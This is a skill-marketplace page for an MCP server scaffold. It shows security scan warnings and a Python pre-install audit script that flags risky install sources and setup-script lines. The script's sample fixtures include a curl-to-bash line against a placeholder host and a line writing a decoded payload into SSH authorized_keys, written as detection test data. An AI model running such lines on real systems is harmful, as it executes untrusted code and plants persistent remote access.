Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using it.

Prooflane MCP Skill

v0.1.0

Clone, install, configure, and run Prooflane's repo-native MCP server locally for evaluation and verification without published package registry dependencies.

by Yifeng [Terry] Yu (@xiaojiou176)
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals: Requires OAuth token
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
Name, description, and runtime instructions align: the skill is an instruction-only scaffold to clone, install, configure, and run a repo-native MCP server. Required tools (git, Node.js, pnpm, Python) and the commands shown are consistent with that purpose. However, the canonical repo is hosted under an apparently personal/unknown GitHub account (xiaojiou176-open), which reduces provenance confidence.
Instruction Scope
SKILL.md explicitly instructs running remote install and runtime scripts from the cloned repo (./scripts/setup.sh, pnpm mcp:start and other pnpm tasks). Those commands will execute code that lives in the external repository; the skill provides no packaged code to inspect and does not sandbox or limit what those scripts do. This is expected for the stated goal but is a scope risk because arbitrary code execution is required.
Install Mechanism
There is no install spec in the skill packet (instruction-only), which is lower automation risk. However, the install path requires cloning a third-party GitHub repository and running its setup/start scripts. Downloading and executing code from an external repo is higher risk than a purely local or vetted package install — verify the repo and scripts first.
Credentials
The skill does not request any secrets or environment variables in the manifest. The documented env vars (UIQ_MCP_API_BASE_URL, UIQ_MCP_TOOL_GROUPS, UIQ_MCP_PERFECT_MODE, and optionally AUTOMATION_API_TOKEN) are reasonable and relevant to running a local MCP server. AUTOMATION_API_TOKEN is optional and only needed if the server exposes token-protected HTTP APIs.
Persistence & Privilege
The skill is not always-enabled, does not require platform-level privileges, and is instruction-only (it does not persist credentials or modify other skills). Autonomous invocation remains possible (default), but that is the platform norm and not by itself a reason to flag.
What to consider before installing
This packet is coherent for its stated purpose, but before you run anything:
(1) inspect the upstream repository and the contents of ./scripts/setup.sh and any pnpm scripts referenced (pnpm mcp:start, mcp:check, etc.) for unexpected network calls, remote downloads, or privileged operations;
(2) prefer cloning a specific commit or tag (pin the repo) rather than the default branch;
(3) run the setup and the server inside an isolated environment (a VM or a disposable container), not on production hosts;
(4) do not supply sensitive credentials or tokens unless you have audited how they are used;
(5) if you need higher assurance, ask the publisher for a signed release, a verified organization repository, or a published package on a trusted registry so you can avoid running unreviewed repository scripts.
If you can provide the contents of the repo (or the specific scripts referenced), I can re-evaluate with higher confidence.
references/OPENCLAW_MCP_CONFIG.json:11 · Install source points to URL shortener or raw IP.
references/OPENHANDS_MCP_CONFIG.json:10 · Install source points to URL shortener or raw IP.
About static analysis
These patterns were detected by automated regex scanning. They may be normal for skills that integrate with external APIs. Check the VirusTotal and OpenClaw results above for context-aware analysis.
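The review checklist above (inspect ./scripts/setup.sh and the pnpm tasks for unexpected network calls or privileged operations) and the two static findings (an install source pointing at a URL shortener or a raw IP) are both mechanical enough to script. The following is an added example, not code from Prooflane, ClawHub or the skill itself: a small pre-install audit in Python that walks an MCP client config for URLs whose host is a raw IP or a known shortener, separating loopback addresses (which a locally run MCP server is expected to use) from other raw IPs, and checks a setup script for fetch-and-execute, payload-decoding and privilege patterns. The mcpServers/command/args/env/url layout, the shortener list and every sample value are assumptions; the page does not show the contents of the referenced config files or of setup.sh.

```python
"""Pre-install audit for a repo-native MCP skill (added example, not Prooflane's or
ClawHub's code). install_source_risks() reproduces the scan's static rule ("Install
source points to URL shortener or raw IP"), extended to IPv6 and separating loopback
hosts (normal for a locally run server) from other raw IPs. script_risks() flags
setup/start script lines that fetch-and-execute remote code, decode embedded payloads,
escalate privilege, or touch SSH/shell startup files. The mcpServers/command/args/env/url
layout and every sample value are assumptions: the referenced config files and
./scripts/setup.sh are not shown on the page."""
import ipaddress
import re
from typing import Any, Iterator, Optional
from urllib.parse import urlparse

SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "cutt.ly", "rb.gy"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
SCRIPT_PATTERNS = [  # (regex, why it matters); each hit on a non-comment line is one finding
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"), "remote script piped into a shell"),
    (re.compile(r"(^|[;&|]\s*)eval\b"), "eval of constructed command text"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\bsudo\b"), "privilege escalation"),
    (re.compile(r"\.ssh/|\.bashrc|\.zshrc|\.profile\b|\bcrontab\b"), "touches SSH keys, shell startup files, or cron"),
]


def _walk_strings(node: Any, path: str = "$") -> Iterator[tuple[str, str]]:
    """Yield (json_path, value) for every string leaf of a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def classify_host(host: str) -> Optional[str]:
    """'url-shortener', 'raw-ip-loopback', 'raw-ip', or None for an ordinary DNS name."""
    host = host.lower()
    if host in SHORTENER_HOSTS:
        return "url-shortener"  # the real destination cannot be reviewed or pinned
    try:
        ip = ipaddress.ip_address(host)  # urlparse already strips IPv6 brackets
    except ValueError:
        return None  # a hostname: provenance can at least be checked via DNS and TLS
    return "raw-ip-loopback" if ip.is_loopback else "raw-ip"


def install_source_risks(config: dict) -> list[tuple[str, str, str]]:
    """Return (label, json_path, url) for every URL whose host is a shortener or a raw IP."""
    findings = []
    for path, text in _walk_strings(config):
        for url in URL_RE.findall(text):
            label = classify_host(urlparse(url).hostname or "")
            if label is not None:
                findings.append((label, path, url))
    return findings


def script_risks(script_text: str) -> list[str]:
    """Return 'line N: reason: text' for each non-comment line matching SCRIPT_PATTERNS."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        findings.extend(f"line {lineno}: {why}: {stripped}" for rx, why in SCRIPT_PATTERNS if rx.search(line))
    return findings


SAMPLE_CONFIG = {  # constructed: one entry shaped like a local server, one deliberately bad
    "mcpServers": {
        "prooflane": {"command": "pnpm", "args": ["mcp:start"],
                      "env": {"UIQ_MCP_API_BASE_URL": "http://127.0.0.1:8000"}},
        "evil-mirror": {"command": "npx", "args": ["-y", "http://203.0.113.10:8080/server.tgz"],
                        "url": "https://bit.ly/x1y2z"},
    }
}
SAMPLE_SETUP_SH = """\
#!/usr/bin/env bash
set -euo pipefail
pnpm install --frozen-lockfile
# the two lines below are the kind of thing to refuse to run unreviewed
curl -fsSL https://example.invalid/bootstrap.sh | bash
echo "$PAYLOAD" | base64 -d > ~/.ssh/authorized_keys
"""


def audit(config: dict, script_text: str) -> bool:
    """Print both reports; True only if nothing beyond loopback install sources was found."""
    sources, scripts = install_source_risks(config), script_risks(script_text)
    for label, path, url in sources:
        print(f"[{label}] {path} -> {url}")
    for finding in scripts:
        print(f"[script] {finding}")
    return not scripts and all(label == "raw-ip-loopback" for label, _, _ in sources)


if __name__ == "__main__":
    raise SystemExit(0 if audit(SAMPLE_CONFIG, SAMPLE_SETUP_SH) else 1)
```

Run it against the real files after cloning (json.load the config, read setup.sh into a string) and refuse to start the server while audit() returns False. A loopback-only hit on the static rule is the expected shape for a server you run yourself, which is why the example labels it separately instead of suppressing it; a public raw IP or a shortener in an install source is the case that deserves a stop.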


Tags: automation · latest · mcp · proof · prooflane · preview

